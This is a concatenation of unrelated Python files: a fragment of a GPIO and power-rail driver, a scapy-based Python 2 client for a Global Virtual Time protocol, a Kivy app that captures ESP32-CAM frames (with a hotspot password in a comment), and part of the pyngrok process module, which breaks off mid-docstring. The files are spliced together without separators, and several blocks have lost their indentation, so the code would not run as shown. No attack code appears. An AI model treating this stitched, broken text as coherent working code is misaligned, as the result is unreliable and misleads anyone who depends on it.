    high,mid,low = list(map(ord, resp))
    return low | (mid << 8) | (high << 16)

@min_proto_version("0.2")
@capability('G')
def gpio_get_direction_0_2(self, gpio_idx):
    '''Protocol 0.2 implementation of gpio_get_direction.

    Note: the 0.2 wire format is one bit per pin, so GPIO_TRISTATE is
    never returned by this path -- only INPUT (0) or OUTPUT (1).
    '''
    if gpio_idx >= 24:
        raise self.ParameterError("Request for illegal gpio idx")
    if ((self._gpio_get_direction_0_2() >> gpio_idx) & 0x1) == 0:
        return ICE.GPIO_INPUT
    else:
        return ICE.GPIO_OUTPUT
@min_proto_version("0.2")
@capability('g')
def gpio_set_level_0_2(self, gpio_idx, level):
    '''Protocol 0.2 implementation of gpio_set_level.'''
    # Read-modify-write of the whole 24-bit bank: fetch current levels,
    # flip one bit, write the full mask back. Not atomic with respect to
    # any other writer of the bank.
    mask = self._gpio_get_level_0_2()
    if level:
        mask |= (1 << gpio_idx)
    else:
        mask &= ~(1 << gpio_idx)
    self.send_message_until_acked('g',
            struct.pack('BBBB', ord('l'),
                (mask >> 16) & 0xff,
                (mask >> 8) & 0xff,
                mask & 0xff))

@min_proto_version("0.2")
@capability('g')
def gpio_set_direction_0_2(self, gpio_idx, direction):
    '''Protocol 0.2 implementation of gpio_set_direction.

    The 0.2 wire format is one bit per pin; TRISTATE is mapped onto the
    same bit value as INPUT.
    '''
    # Same read-modify-write pattern as gpio_set_level_0_2.
    mask = self._gpio_get_direction_0_2()
    if direction == ICE.GPIO_OUTPUT:
        mask |= (1 << gpio_idx)
    elif direction in (ICE.GPIO_INPUT, ICE.GPIO_TRISTATE):
        mask &= ~(1 << gpio_idx)
    else:
        raise self.ParameterError("Illegal GPIO direction")
    self.send_message_until_acked('g',
            struct.pack('BBBB', ord('d'),
                (mask >> 16) & 0xff,
                (mask >> 8) & 0xff,
                mask & 0xff))
@min_proto_version("0.2")
@capability('G')
def gpio_get_interrupt_enable_mask(self):
    '''Read the 24-bit GPIO interrupt-enable mask (one bit per pin).'''
    resp = self.send_message_until_acked('G', struct.pack('B', ord('i')))
    if len(resp) != 3:
        raise self.FormatError("Bad response from `Gi':" + str(resp))
    # NOTE(review): map(ord, ...) assumes a Python 2 str response; on
    # Python 3 bytes this raises TypeError -- confirm interpreter.
    high,mid,low = list(map(ord, resp))
    return low | (mid << 8) | (high << 16)

@min_proto_version("0.2")
@capability('g')
def gpio_set_interrupt_enable_mask(self, mask):
    '''Write the 24-bit GPIO interrupt-enable mask (one bit per pin).'''
    # Transmit most-significant byte first, matching the read format.
    self.send_message_until_acked('g',
            struct.pack('BBBB', ord('i'),
                (mask >> 16) & 0xff,
                (mask >> 8) & 0xff,
                mask & 0xff))
## POWER ##
# Rail identifiers; the first three double as indices into the default
# voltage tuple used below.
POWER_0P6 = 0
POWER_1P2 = 1
POWER_VBATT = 2
POWER_GOC = 3

# Nominal (power-on) voltage for each adjustable rail, in volts.
POWER_0P6_DEFAULT = 0.675
POWER_1P2_DEFAULT = 1.2
POWER_VBATT_DEFAULT = 3.8

@min_proto_version("0.1")
@capability('P')
def power_get_voltage(self, rail):
    '''
    Query the current voltage setting of a power rail.

    The `rail' argument must be one of:
        ICE.POWER_0P6
        ICE.POWER_1P2
        ICE.POWER_VBATT

    Returns the estimated output voltage in volts. Note the firmware
    cannot be queried, so this relies on the value cached by
    power_set_voltage (attribute `power_<rail>`); without a cached value
    the default raw setting is used, which evaluates to exactly the
    rail's default voltage.
    '''
    if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT):
        raise self.ParameterError("Invalid rail: " + str(rail))
    logger.warn("ICE Firmware <= 0.3 cannot query voltage. Returning cached value.")
    try:
        # Cached raw DAC setting stored by power_set_voltage.
        raw = getattr(self, 'power_{}'.format(rail))
    except AttributeError:
        logger.warn("No cached value, returning default")
        # Inverse of the transfer function at multiplier 1.0, so vout
        # below comes out as default_voltage.
        raw = (1 - 0.537) / 0.0185
    #resp = self.send_message_until_acked('P', struct.pack("BB", ord('v'), rail))
    #if len(resp) != 2:
    #    raise self.FormatError, "Wrong response length from `Pv#':" + str(resp)
    #rail, raw = struct.unpack("BB", resp)
    # Vout = (0.537 + 0.0185 * v_set) * Vdefault
    default_voltage = (ICE.POWER_0P6_DEFAULT, ICE.POWER_1P2_DEFAULT,
            ICE.POWER_VBATT_DEFAULT)[rail]
    vout = (0.537 + 0.0185 * raw) * default_voltage
    return vout
@min_proto_version("0.1")
@capability('P')
def power_get_onoff(self, rail):
    '''
    Query the current on/off setting of a power rail.

    Returns a boolean, on=True.
    '''
    valid_rails = (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT, ICE.POWER_GOC)
    if rail not in valid_rails:
        raise self.ParameterError("Invalid rail: " + str(rail))
    resp = self.send_message_until_acked('P', struct.pack("BB", ord('o'), rail))
    if len(resp) != 1:
        raise self.FormatError("Too long of a response from `Po#':" + str(resp))
    # Single status byte: non-zero means the rail is on.
    return bool(struct.unpack("B", resp)[0])
@min_proto_version("0.1")
@capability('p')
def power_set_voltage(self, rail, output_voltage):
    '''
    Set the voltage setting of a power rail. Units are V.

    Raises ParameterError if the rail is invalid or the requested
    voltage maps outside the 8-bit DAC range.
    '''
    if rail not in (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT):
        raise self.ParameterError("Invalid rail: " + str(rail))
    # Vout = (0.537 + 0.0185 * v_set) * Vdefault
    output_voltage = float(output_voltage)
    default_voltage = (ICE.POWER_0P6_DEFAULT, ICE.POWER_1P2_DEFAULT,
            ICE.POWER_VBATT_DEFAULT)[rail]
    # Invert the transfer function to get the raw DAC setting.
    vset = ((output_voltage / default_voltage) - 0.537) / 0.0185
    vset = int(vset)
    if (vset < 0) or (vset > 255):
        raise self.ParameterError("Voltage exceeds range. vset: " + str(vset))
    self.send_message_until_acked('p', struct.pack("BBB", ord('v'), rail, vset))
    # Cache the raw setting so power_get_voltage can report it back
    # (the firmware cannot be queried).
    setattr(self, 'power_{}'.format(rail), vset)
@min_proto_version("0.1")
@capability('p')
def power_set_onoff(self, rail, onoff):
    '''
    Turn a power rail on or off (on=True).
    '''
    valid_rails = (ICE.POWER_0P6, ICE.POWER_1P2, ICE.POWER_VBATT, ICE.POWER_GOC)
    if rail not in valid_rails:
        raise self.ParameterError("Invalid rail: " + str(rail))
    # Payload: sub-command 'o', rail id, on/off flag.
    command = struct.pack("BBB", ord('o'), rail, onoff)
    self.send_message_until_acked('p', command)
if __name__ == '__main__':
logger.setLevel(level=logging.DEBUG)
#!/usr/bin/env python
import argparse
import sys
import socket
import random
import struct
import threading
import time
import thread
import json
from scapy.all import sendp, send, get_if_list, get_if_hwaddr
from scapy.all import Packet
from scapy.all import Ether, IP, UDP, TCP
from proposalHeader import GvtProtocol
from receive import *
TYPE_PROP = 0x1919
TYPE_REQ = 0x1515
TYPE_GVT = 0x600
TYPE_DEL = 0x1313
TYPE_PREPARE = 0x3333
TYPE_PREPAREOK = 0x4444
TYPE_STARTCHANGE = 0x4343
TYPE_STARTVIEW = 0x4747
TYPE_FAILURE = 0x5555
TYPE_DELFAILURE = 0x6666
TYPE_VIEWCHANGE = 0x700
TYPE_RESENDPROP = 0x1919
class gvtControl:
    """
    GVT (Global Virtual Time) proposal client (Python 2 / scapy).

    Resolves `dest_ip`, then starts three threads: a sniffer that consumes
    GVT updates (TCP dport 1234), a producer that enqueues one proposal
    every 3 seconds, and a sender that drains the queue with stop-and-wait
    (at most one unacknowledged proposal in flight).
    """
    def __init__(self, dest_ip, pid):
        #creates socket to a destination
        self.addr = socket.gethostbyname(dest_ip)
        self.iface = self.get_if()
        self.pid = pid
        self.dest_ip = dest_ip
        self.GVT_value = 0              # last GVT value received
        self.last_proposal = 0          # last proposal value sent
        self.last_proposal_time = 0     # timestamp of the in-flight proposal
        self.leader_alive = 1
        # Stop-and-wait state: 0 means nothing outstanding, otherwise the
        # proposal value awaiting acknowledgement.
        self.sent_but_not_yet_acknowledged = 0
        #interfaces
        self.f = open("demofile.txt", "w")  # round-trip latency log
        self.queue = []                     # pending [value, timestamp] pairs
        #start receiver thread
        self.receivethread = threading.Thread(target=self.receiveThread)
        self.receivethread.start()
        #just for debugging
        #start run loop
        self.run_loop = threading.Thread(target=self.runThread)
        self.run_loop.start()
        self.send = threading.Thread(target=self.send_queue)
        self.send.start()

    def receiveThread(self):
        """Sniff loop: feed every packet on our interface to handle_pkt."""
        #ifaces = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))
        #iface = ifaces[0]
        print "sniffing on %s" % self.iface
        sys.stdout.flush()
        sniff(iface = self.iface, prn = lambda x: self.handle_pkt(x))

    #TODO: Change this interface after the failure
    def handle_pkt(self, pkt):
        """Process a sniffed packet; only TCP dport 1234 carries GVT updates."""
        if TCP in pkt and pkt[TCP].dport == 1234:
            print "got a packet"
            #pkt.show2()
            # hexdump(pkt)
            sys.stdout.flush()
            # Payload is a one-entry JSON dict {pid: gvt_value}.
            self.proposal = json.loads(pkt.load)
            self.key = self.proposal.keys()
            self.GVT_value = self.proposal[self.key[0]]
            print "got new value: " + str(self.GVT_value)
            # Round-trip time since the matching proposal was dequeued.
            update_time = time.time() - self.last_proposal_time
            print("time: " + str(update_time)) #just work for new experiments
            self.f.write(str(update_time) + "\n")
            #acknowledges the message_value
            if self.GVT_value == self.sent_but_not_yet_acknowledged:
                self.sent_but_not_yet_acknowledged = 0
            self.f.flush()

    def resend_old_messages(self):
        """Re-send the proposal still awaiting acknowledgement, if any."""
        # Only a single message is in flight at the moment.
        # TODO: store and re-send every application message.
        if(self.sent_but_not_yet_acknowledged):
            self.send_packet(message_value=int(self.sent_but_not_yet_acknowledged), process_pid=self.pid)

    def get_if(self):
        """Return the first interface containing 'eth0' (exits if none)."""
        self.ifs=get_if_list()
        iface=None # "h1-eth0"
        for i in get_if_list():
            if "eth0" in i:
                iface=i
                break;
        if not iface:
            print "Cannot find eth0 interface"
            exit(1)
        # Keep the remaining interfaces around (minus loopback and eth0).
        self.ifs.remove('lo')
        self.ifs.remove('eth0')
        print(self.ifs)
        return iface

    def send_packet(self, message_value, process_pid):
        """Broadcast {pid: value} as a JSON payload in a forged TCP packet."""
        self.payload = {}
        self.payload[process_pid] = message_value
        # Layer-2 broadcast; the destination IP still targets the leader.
        pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type = 0x800)
        pkt = pkt /IP(dst=self.addr) / TCP(dport=7777, sport=random.randint(49152,65535))/ json.dumps(self.payload)
        sendp(pkt, iface=self.iface, verbose=False)

    def build_proposal(self, proposal_value):
        """Record and transmit a new GVT proposal."""
        self.last_proposal = int(proposal_value)
        self.send_packet(message_value=int(proposal_value), process_pid=self.pid)

    #this thread implements a run loop. Just for writing LVT values as a debug functionality
    def runThread(self):
        """Producer: enqueue an incrementing value every 3 seconds."""
        value = 1
        while True:
            #0.1 ---- 1 ------ 100
            time.sleep(3)
            print "sending on interface %s to %s" % (self.iface, str(self.addr))
            #TODO: We need to enforce the concurrency control here
            self.queue.append([value, time.time()])
            value = value + 1

    def send_queue(self):
        """Sender: stop-and-wait drain of the proposal queue (busy loop)."""
        #TODO: concurrency control
        while True:
            if(self.sent_but_not_yet_acknowledged == 0 and len(self.queue) > 0):
                get = self.queue.pop(0)
                self.sent_but_not_yet_acknowledged = get[0]
                print self.sent_but_not_yet_acknowledged
                self.last_proposal_time = get[1]
                self.build_proposal(proposal_value=self.sent_but_not_yet_acknowledged)
def main():
    """Entry point: validate argv and start a gvtControl instance."""
    if len(sys.argv)<3:
        #TODO: Does not make sense this Dest IP. Solve it
        print 'pass 2 arguments: <destination_ip> <pid>'
        exit(1)
    # The constructor starts all worker threads; nothing more to do here.
    GVTcontrol_instance = gvtControl(sys.argv[1], int(sys.argv[2]))
if __name__ == '__main__':
main()
import kivy
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.widget import Widget
from kivy.uix.image import Image, AsyncImage
from kivy.uix.label import Label
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.properties import ObjectProperty
from kivy.properties import BooleanProperty
from kivy.loader import Loader
from kivy.clock import Clock
import time
import urllib.request
import numpy
import os
from kivy.network.urlrequest import UrlRequest
from functools import partial
from kivy_garden.graph import Graph, MeshLinePlot, BarPlot
from threading import Thread
from PIL import Image, ImageStat, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
# If ESP is hosting
# Name: I-SEE-YOU
# Pass: yeetyeet
# IP: 192.168.4.1
capUrl = 'http://192.168.4.1/capture'  # ESP32-CAM capture endpoint
# capUrl = 'http://192.168.1.189/capture'
# capUrl = 'https://www.neenahpaper.com/-/media/images/storefront/chips/environment-papers/environment-papers-ultra-bright-white-smooth.ashx'
# Shared image widget backed by the most recent capture on disk.
capimg = kivy.uix.image.Image(source="images/capture.png")
logs = 0        # toggles which log slot (1 or 2) gets the next min/max snapshot
times = []      # per-capture download durations, seconds
sched_val = 0.265   # Clock scheduling interval between captures, seconds
ex_avg = 0      # running mean of `times` (formatted string once captures start)
cap_cnt = 0     # total number of captures taken
fps_val = 0     # estimated frames/sec from mean download time + sched_val
class ButtonTest(Widget):
    # Placeholder widget; any layout comes from the .kv file.
    pass
def get_brightness_level():
    """
    Debug stand-in for get_brightness: floods `levels` with a constant 99.

    Intended to run on a background thread (see the commented-out Thread
    in __main__). Busy-loops with no sleep, so it will pin a CPU core.
    """
    global levels
    while True:
        mx = 99
        # Cap the plot history at 300 samples by clearing and restarting.
        if len(levels) >= 300:
            levels = []
        levels.append(mx)
def get_brightness():
    """
    Append the RMS luminance of the latest capture to `levels`.

    Loads the capture file, converts to grayscale ('L'), and uses
    PIL ImageStat to compute the RMS pixel value.
    """
    global levels
    # NOTE(review): the backslash path only works because \c is not an
    # escape sequence, and it is Windows-specific -- confirm portability.
    im = Image.open("images\capture.png").convert('L')
    stat = ImageStat.Stat(im)
    # Cap the plot history at 300 samples.
    if len(levels) >= 300:
        levels = []
    levels.append(stat.rms[0])
    print("--- %s bright ---" % stat.rms[0])
def imagegrabhandler(self, *args):
    """Clock callback: time one capture cycle and refresh the shared image."""
    start = time.time()
    imagegrab(self, start)
    update(self)

def imagegrab(self, start, *args):
    """
    Download one frame from capUrl to disk and update capture statistics.

    Updates the module-level counters: capture count, mean download time,
    estimated FPS, and the brightness history (via get_brightness).
    """
    global cap_cnt
    global ex_avg
    global fps_val
    urllib.request.urlretrieve(
        capUrl, "images\capture.png")
    times.append(time.time() - start)
    print("--- %s seconds ---" % (times[-1]))
    cap_cnt += 1
    ex_avg = numpy.format_float_positional(numpy.mean(times), precision=5)
    # FPS estimate accounts for the scheduler interval on top of download time.
    fps_val = numpy.format_float_positional(1 / (numpy.mean(times) + sched_val), precision=2)
    get_brightness()

def update(self):
    """Force the shared capture widget to reload its image from disk."""
    capimg.reload()

class Progress(Screen):
    # Screen placeholder; layout defined in the .kv file (if present).
    pass
class LayoutTest(BoxLayout):
    """
    Main capture UI: a vertical BoxLayout showing the latest frame, a
    brightness plot, and capture statistics, all driven by Kivy's Clock.
    """
    # Kivy properties bound into the .kv layout.
    your_time = StringProperty()     # wall-clock display string
    img = ObjectProperty()           # the displayed image widget
    count = StringProperty()         # capture count display
    exavg = StringProperty()         # mean exposure/download time display
    fps = StringProperty()           # estimated FPS display
    exint = StringProperty()         # scheduling interval display
    highinten = StringProperty()     # max brightness in current window
    lowinten = StringProperty()      # min brightness in current window
    log1min = StringProperty()       # snapshot log slot 1, min
    log1max = StringProperty()       # snapshot log slot 1, max
    log2min = StringProperty()       # snapshot log slot 2, min
    log2max = StringProperty()       # snapshot log slot 2, max
    isShownStats = BooleanProperty(True)
    isShownLog = BooleanProperty(False)
    isShownMenu = BooleanProperty(False)
    isCapture = BooleanProperty(False)

    def __init__(self, **kwargs):
        super(LayoutTest, self).__init__(**kwargs)
        self.orientation = "vertical"
        self.padding = 10
        self.img.source = "images\default.png"
        self.plot = MeshLinePlot(color=[1, 0, 0, 1])
        # Keep the clock display current at 10 Hz.
        Clock.schedule_interval(self.set_time, 0.1)

    def logdata(self):
        """Snapshot current min/max brightness into alternating log slots."""
        global logs
        if len(levels) > 1:
            if logs == 0:
                self.log1max = str(round(max(levels)))
                self.log1min = str(round(min(levels)))
                logs = 1
            else:
                self.log2max = str(round(max(levels)))
                self.log2min = str(round(min(levels)))
                logs = 0

    def start_capture(self):
        """Begin the capture loop: plot updates, grabs, refreshes, stats."""
        self.ids.graph.add_plot(self.plot)
        Clock.schedule_interval(self.get_value, 0.325)
        # Take one frame immediately so there is something to display.
        imagegrabhandler(self)
        Clock.schedule_interval(imagegrabhandler, sched_val)
        # Swap from the placeholder to the live capture once one exists.
        Clock.schedule_once(self.switch, sched_val + 0.1)
        Clock.schedule_interval(self.refresh, sched_val)
        Clock.schedule_interval(self.stat, 0.5)

    def stop_capture(self):
        """Halt all scheduled capture callbacks and show the placeholder."""
        self.switch(0)
        # WOOOOOEE THERE, maybe don't use these slow methods
        Clock.unschedule(imagegrabhandler)
        Clock.unschedule(self.refresh)
        Clock.unschedule(self.get_value)
        Clock.unschedule(self.stat)

    def stat(self, dt):
        """Copy module-level capture stats into the displayed properties."""
        self.count = str(cap_cnt)
        self.exavg = str(ex_avg)
        self.fps = str(fps_val)
        self.exint = str(sched_val)

    def get_value(self, dt):
        """Refresh the brightness plot and its min/max labels."""
        self.plot.points = [(i/2, j) for i, j in enumerate(levels)]
        if len(levels) > 1:
            self.highinten = str(round(max(levels)))
            self.lowinten = str(round(min(levels)))

    def set_time(self, dt):
        self.your_time = time.strftime("%m/%d/%Y - %I:%M %p")

    def switch(self, val):
        """Show the live capture (truthy val) or the placeholder image."""
        if val:
            self.img.source = "images\capture.png"
        else:
            self.img.source = "images\default.png"

    def refresh(self, bruh_why_am_i_here):
        self.img.reload()

    def clear_values(self):
        """Reset the brightness history and all displayed statistics."""
        global levels
        levels = []
        self.plot.points = [(i / 2, j) for i, j in enumerate(levels)]
        self.count = str(0)
        self.exavg = str(0)
        self.fps = str(0)
        self.exint = str(0)
        self.lowinten = str(0)
        self.highinten = str(0)
        self.log1max = str(0)
        self.log1min = str(0)
        self.log2max = str(0)
        self.log2min = str(0)
class FASSPRAppa(App):
    # NOTE(review): near-duplicate of FASSPRApp below (which is the one
    # actually run from __main__); this variant also carries the UrlRequest
    # test helpers -- confirm whether it is dead code.
    def build(self):
        root = LayoutTest()
        # root.add_widget(ButtonTest())
        # ImageTest().sched()
        return root

    def run_cap(self, *args):
        """Fire 10 async capture requests; update_label logs each completion."""
        for i in range(10):
            r = UrlRequest("http://192.168.1.189/capture", on_success=partial(self.update_label, i))
            print(i)

    def update_label(self, i, *args):
        print(i)
## --------------------------------------------------------------------------------------------------------------------
import itertools
from kivy.utils import get_color_from_hex as rgb
# Repeating palette for successive plots.
colors = itertools.cycle([rgb('7dac9f'), rgb('dc7062'), rgb('66a8d4'), rgb('e5b060')])
class SASSPRRoot(BoxLayout):
    # Root container that can swap its content for a Testy widget.
    img = ObjectProperty()
    # def __init__(self, **kwargs):
    #     super().__init__(**kwargs)

    def showtest(self):
        """Replace all children with a fresh Testy widget."""
        self.clear_widgets()
        self.img = Testy()
        self.add_widget(self.img)

class Testy(BoxLayout):
    # NOTE(review): `ObjectProperty` is assigned without calling it, so
    # `ree` holds the property class rather than a property instance --
    # looks like missing parentheses; confirm intent.
    ree = ObjectProperty

class List(BoxLayout):
    # NOTE(review): this class name shadows nothing locally but mirrors the
    # `list` builtin in spirit; layout presumably lives in the .kv file.
    but = ObjectProperty()
class Main(Screen):
    """
    Screen-based variant of the capture UI (parallel to LayoutTest).

    NOTE(review): unlike LayoutTest, __init__ never creates `self.plot`,
    yet start_capture, reset_plots, and get_value all use it -- these
    methods would raise AttributeError as written; confirm whether this
    class is still in use.
    """
    img = ObjectProperty()
    isShownMenu = BooleanProperty(False)
    isShownStats = BooleanProperty(True)
    isCaptureOn = BooleanProperty(False)
    isShownGraph = BooleanProperty(False)
    your_time = StringProperty()
    count = StringProperty()
    exavg = StringProperty()
    fps = StringProperty()
    exint = StringProperty()

    def __init__(self, **kwargs):
        super(Main, self).__init__(**kwargs)
        self.img.source = "images\default.png"

    def reset_plots(self, graph):
        """Re-bind each plot to the graph and clear its points."""
        for plot in self.plot:
            plot.bind_to_graph(graph)
            plot.points = []

    def start_capture(self):
        """Begin the capture loop (same scheduling scheme as LayoutTest)."""
        self.ids.graph.add_plot(self.plot)
        Clock.schedule_interval(self.get_value, 0.325)
        imagegrabhandler(self)
        Clock.schedule_interval(imagegrabhandler, sched_val)
        Clock.schedule_once(self.switch, sched_val + 0.1)
        Clock.schedule_interval(self.refresh, sched_val)
        Clock.schedule_interval(self.stat, 0.5)

    def stop_capture(self):
        """Halt all scheduled capture callbacks and show the placeholder."""
        self.switch(0)
        # WOOOOOEE THERE, maybe don't use these slow methods
        Clock.unschedule(imagegrabhandler)
        Clock.unschedule(self.refresh)
        Clock.unschedule(self.get_value)
        Clock.unschedule(self.stat)

    def stat(self, dt):
        """Copy module-level capture stats into the displayed properties."""
        self.count = str(cap_cnt)
        self.exavg = str(ex_avg)
        self.fps = str(fps_val)
        self.exint = str(sched_val)

    def switch(self, val):
        """Show the live capture (truthy val) or the placeholder image."""
        if val:
            self.img.source = "images\capture.png"
        else:
            self.img.source = "images\default.png"

    def refresh(self, bruh_why_am_i_here):
        self.img.reload()

    def get_value(self, dt):
        """Refresh the brightness plot from the shared `levels` history."""
        self.plot.points = [(i/2, j) for i, j in enumerate(levels)]
class FASSPRApp(App):
    # Application entry point; the root widget is the LayoutTest BoxLayout.
    def build(self):
        return LayoutTest()

if __name__ == '__main__':
    # Shared brightness history consumed by the plotting callbacks.
    levels = []
    # get_level_thread = Thread(target=get_brightness_level)
    # get_level_thread.daemon = True
    FASSPRApp().run()
import atexit
import logging
import os
import shlex
import subprocess
import threading
import time
import yaml
from future.standard_library import install_aliases
from pyngrok import conf
from pyngrok.exception import PyngrokNgrokError, PyngrokSecurityError
from pyngrok.installer import validate_config
install_aliases()
from urllib.request import urlopen, Request
try:
from http import HTTPStatus as StatusCodes
except ImportError: # pragma: no cover
try:
from http import client as StatusCodes
except ImportError:
import httplib as StatusCodes
__author__ = "Alex Laird"
__copyright__ = "Copyright 2020, Alex Laird"
__version__ = "4.1.1"
logger = logging.getLogger(__name__)
_current_processes = {}
class NgrokProcess:
    """
    An object containing information about the :code:`ngrok` process.

    :var proc: The child process that is running :code:`ngrok`.
    :vartype proc: subprocess.Popen
    :var pyngrok_config: The :code:`pyngrok` configuration to use with :code:`ngrok`.
    :vartype pyngrok_config: PyngrokConfig
    :var api_url: The API URL for the :code:`ngrok` web interface.
    :vartype api_url: str
    :var logs: A list of the most recent logs from :code:`ngrok`, limited in size to :code:`max_logs`.
    :vartype logs: list[NgrokLog]
    :var startup_error: If :code:`ngrok` startup fails, this will be the log of the failure.
    :vartype startup_error: str
    """

    def __init__(self, proc, pyngrok_config):
        self.proc = proc
        self.pyngrok_config = pyngrok_config

        self.api_url = None
        self.logs = []
        self.startup_error = None

        # Startup-state flags, flipped by _log_startup_line() as the
        # corresponding ngrok log messages arrive.
        self._tunnel_started = False
        self._client_connected = False
        self._monitor_thread = None

    def __repr__(self):
        return "<NgrokProcess: \"{}\">".format(self.api_url)

    def __str__(self):  # pragma: no cover
        return "NgrokProcess: \"{}\"".format(self.api_url)

    @staticmethod
    def _line_has_error(log):
        # A log at ERROR or CRITICAL level marks a startup failure.
        return log.lvl in ["ERROR", "CRITICAL"]

    def _log_startup_line(self, line):
        """
        Parse the given startup log line and use it to manage the startup state
        of the :code:`ngrok` process.

        :param line: The line to be parsed and logged.
        :type line: str
        :return: The parsed log.
        :rtype: NgrokLog
        """
        log = self._log_line(line)

        if log is None:
            return
        elif self._line_has_error(log):
            self.startup_error = log.err
        else:
            # Log `ngrok` startup states as they come in
            if "starting web service" in log.msg and log.addr is not None:
                self.api_url = "http://{}".format(log.addr)
            elif "tunnel session started" in log.msg:
                self._tunnel_started = True
            elif "client session established" in log.msg:
                self._client_connected = True

        return log

    def _log_line(self, line):
        """
        Parse, log, and emit (if :code:`log_event_callback` in :class:`~pyngrok.conf.PyngrokConfig` is registered) the
        given log line.

        :param line: The line to be processed.
        :type line: str
        :return: The parsed log.
        :rtype: NgrokLog
        """
        log = NgrokLog(line)

        if log.line == "":
            return None

        # NOTE(review): assumes every non-empty line carries a "lvl" key;
        # getattr(logging, None) would raise here -- confirm the log format.
        logger.log(getattr(logging, log.lvl), line)

        self.logs.append(log)
        # Keep the log buffer bounded: drop the oldest entry past max_logs.
        if len(self.logs) > self.pyngrok_config.max_logs:
            self.logs.pop(0)

        if self.pyngrok_config.log_event_callback is not None:
            self.pyngrok_config.log_event_callback(log)

        return log

    def healthy(self):
        """
        Check whether the :code:`ngrok` process has finished starting up and is in a running, healthy state.

        :return: :code:`True` if the :code:`ngrok` process is started, running, and healthy, :code:`False` otherwise.
        :rtype: bool
        """
        if self.api_url is None or \
                not self._tunnel_started or not self._client_connected:
            return False

        if not self.api_url.lower().startswith("http"):
            raise PyngrokSecurityError("URL must start with \"http\": {}".format(self.api_url))

        # Ensure the process is available for requests before registering it as healthy
        # NOTE(review): urlopen() has no timeout here -- a hung web interface
        # would block this check indefinitely; confirm acceptable.
        request = Request("{}/api/tunnels".format(self.api_url))
        response = urlopen(request)
        if response.getcode() != StatusCodes.OK:
            return False

        return self.proc.poll() is None and \
            self.startup_error is None

    def _monitor_process(self):
        # Runs on the monitor thread: stream child stdout into the log buffer
        # until the process exits or monitoring is switched off via the config flag.
        while self.pyngrok_config.monitor_thread and self.proc.poll() is None:
            self._log_line(self.proc.stdout.readline())

        self._monitor_thread = None

    def start_monitor_thread(self):
        """
        Start a thread that will monitor the :code:`ngrok` process and its logs until it completes.

        If a monitor thread is already running, nothing will be done.
        """
        if self._monitor_thread is None:
            self._monitor_thread = threading.Thread(target=self._monitor_process)
            self._monitor_thread.start()

    def stop_monitor_thread(self):
        """
        Set the monitor thread to stop monitoring the :code:`ngrok` process after the next log event. This will not
        necessarily terminate the thread immediately, as the thread may currently be idle, rather it sets a flag
        on the thread telling it to terminate the next time it wakes up.

        This has no impact on the :code:`ngrok` process itself, only :code:`pyngrok`'s monitor of the process and
        its logs.
        """
        if self._monitor_thread is not None:
            self.pyngrok_config.monitor_thread = False
class NgrokLog:
    """
    An object containing a parsed log from the :code:`ngrok` process.

    :var line: The raw, unparsed log line.
    :vartype line: str
    :var t: The log's ISO 8601 timestamp.
    :vartype t: str
    :var lvl: The log's level.
    :vartype lvl: str
    :var msg: The log's message.
    :vartype msg: str
    :var err: The log's error, if applicable.
    :vartype err: str
    :var addr: The URL, if :code:`obj` is "web".
    :vartype addr: str
    """

    def __init__(self, line):
        self.line = line.strip()

        self.t = None
        self.lvl = None
        self.msg = None
        self.err = None
        self.addr = None

        for i in shlex.split(self.line):
            if "=" not in i:
                continue

            # Split on the first "=" only, so values that themselves contain
            # "=" (URLs with query strings, tokens, etc.) are kept intact.
            # A bare split() would raise ValueError on such tokens.
            key, value = i.split("=", 1)

            if key == "lvl":
                # Normalize ngrok's abbreviated level names to the names
                # used by Python's logging module.
                value = value.upper()
                if value == "CRIT":
                    value = "CRITICAL"
                elif value in ["ERR", "EROR"]:
                    value = "ERROR"
                elif value == "WARN":
                    value = "WARNING"

            setattr(self, key, value)

    def __repr__(self):
        return "<NgrokLog: t={} lvl={} msg=\"{}\">".format(self.t, self.lvl, self.msg)

    def __str__(self):  # pragma: no cover
        attrs = [attr for attr in dir(self) if not attr.startswith("_") and getattr(self, attr) is not None]
        attrs.remove("line")

        return " ".join("{}=\"{}\"".format(attr, getattr(self, attr)) for attr in attrs)
def set_auth_token(pyngrok_config, token):
    """
    Set the :code:`ngrok` auth token in the config file, enabling authenticated features (for instance,
    more concurrent tunnels, custom subdomains, etc.).

    :param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
    :type pyngrok_config: PyngrokConfig
    :param token: The auth token to set.
    :type token: str
    """
    cmd = [pyngrok_config.ngrok_path, "authtoken", token, "--log=stdout"]
    if pyngrok_config.config_path:
        cmd += ["--config={}".format(pyngrok_config.config_path)]

    # ngrok confirms a successful save on stdout; anything else is a failure.
    result = subprocess.check_output(cmd)
    if "Authtoken saved" not in str(result):
        raise PyngrokNgrokError("An error occurred when saving the auth token: {}".format(result))
def get_process(pyngrok_config):
    """
    Retrieve the current :code:`ngrok` process for the given config's :code:`ngrok_path`.

    If :code:`ngrok` is not running, calling this method will first start a process with
    :class:`~pyngrok.conf.PyngrokConfig`.

    :param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
    :type pyngrok_config: PyngrokConfig
    :return: The :code:`ngrok` process.
    :rtype: NgrokProcess
    """
    existing = _current_processes.get(pyngrok_config.ngrok_path)
    if existing is not None:
        # Ensure the process is still running and hasn't been killed externally
        if existing.proc.poll() is None:
            return existing
        _current_processes.pop(pyngrok_config.ngrok_path, None)

    return _start_process(pyngrok_config)
def run_process(ngrok_path, args):
    """
    Start a blocking :code:`ngrok` process with the given args.

    :param ngrok_path: The path to the :code:`ngrok` binary.
    :type ngrok_path: str
    :param args: The args to pass to :code:`ngrok`.
    :type args: list[str]
    """
    _ensure_path_ready(ngrok_path)
    # Blocks until the ngrok process exits.
    subprocess.call([ngrok_path] + args)
def kill_process(ngrok_path):
    """
    Terminate the :code:`ngrok` processes, if running, for the given path. This method will not block, it will just
    issue a kill request.

    :param ngrok_path: The path to the :code:`ngrok` binary.
